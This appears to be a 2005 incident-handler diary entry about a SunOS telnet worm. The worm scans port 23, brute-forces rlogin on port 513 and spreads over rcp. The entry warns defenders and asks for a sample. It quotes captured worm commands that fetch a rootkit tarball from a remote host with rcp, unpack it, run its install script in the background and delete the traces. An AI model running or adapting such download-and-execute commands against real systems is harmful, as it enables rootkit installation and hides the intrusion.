SunOS telnet worm on the loose Watch ports 23, 513 and 514
The telnet port(23) is being targeted and rcp is the download port(514)
used to grab the worm/autorooter kit via rcp.
We have received several reports of what appears to be a telnet negotiation
exploit with autorooter or worm like qualities.
Further reports shows many of the hosts being reported for telnet scans
are also being reported for a rlogin bruteforce on port 513
It was reported that the probes for port 23 began on 03/20/2005
Looking at isc.sans.org shows 23 has been fairly active but the
number of targets had a large increase on 03/23/2005.
I pulled these commands from a user provide tcpdump file :
mkdir /tmp/.m ; cd /tmp/.m; echo /usr/bin/rcp
firstname.lastname@example.org:/usr/lib/.dl/rk/yatze-SunOS_`/usr/bin/uname -m`.tar . >mrun.sh
echo /usr/bin/tar -xvf yatze-SunOS_`/usr/bin/uname -m`.tar >>mrun.sh
echo cd rk \; /bin/sh go >>mrun.sh
echo cd / \; rm -rf /tmp/.m/\* \; rm -rf /tmp/.m >>mrun.sh
/usr/bin/nohup /bin/sh mrun.sh >/dev/null 2>/dev/null &
We have not gotten a copy of the actual worm/autorooter yet
If you have a copy we would like to analysis it
I looked at mynetwatchman.com most of the port 23 "violators"
are also showing up for attempting to bruteforce guess the password
on port 513 (rlogin).
InfoCon Alert Status Calibration
We have received a lot of emails about our InfoCon Alert Status
since yesterdays diary requested your feedback/opinions of it.
We will review them and consider each suggestion.
Please keep submitting in your ideas via the contact page.
Mar 26th 2005